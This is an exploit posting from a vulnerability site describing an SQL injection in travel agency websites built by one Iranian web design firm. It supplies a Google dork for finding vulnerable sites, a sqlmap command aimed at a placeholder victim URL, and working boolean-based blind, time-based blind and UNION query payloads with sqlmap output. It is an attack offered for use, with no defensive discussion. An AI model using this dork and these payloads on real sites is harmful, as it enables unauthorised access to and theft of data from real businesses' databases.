Websites of Iranian travel agencies By Aryan chehreghani

2020.05.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#- # Exploit Title: [sql Injection] # Google Dork: [inurl:php?id= intext:طراحی وب سایت : ایران تکنولوژی] # Software Link: http://sqlmap.org/ # Dork CVE: N/A # Date: [2020-05-24] # Exploit Author: [Aryan Chehreghani | Ictus_TM] # Team Channel : T.me/Ictus_TM # Version: All Version # Tested on: [Linux / Windows / ....] ______________________________________________________________________________________ SQLMAP : [-] sqlmap -u "http://victim.com/fa/user/temp.php?pavc_njol=specific&id=87 --dbs ______________________________________________________________________________________ Testing : Generic UNION query (NULL) MySQL >= 5.0.12 AND time-based blind (query SLEEP) [#] Testing Method: [+] - boolean-based blind [+] - time-based blind ______________________________________________________________________________________ ||||||||||||||||||||||| Parameter: sec (GET) || ||||||||||||||||||||||| EX Payload : --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: irantech_parvaz=specific&id=87' AND 4752=4752 AND 'qNzU'='qNzU Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: irantech_parvaz=specific&id=87' AND (SELECT 7431 FROM (SELECT(SLEEP(5)))QoYj) AND 'irYH'='irYH Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: irantech_parvaz=specific&id=-6437' UNION ALL SELECT NULL,NULL,CONCAT(0x71716b6b71,0x4c70465956435372566e62444e59784e476a416c6951684d4375484c4754566365796f4747777a79,0x71766b7071)-- - --- [05:49:06] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 ____________________________________________________________________________________ [=] T.me/Clvsornapv


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top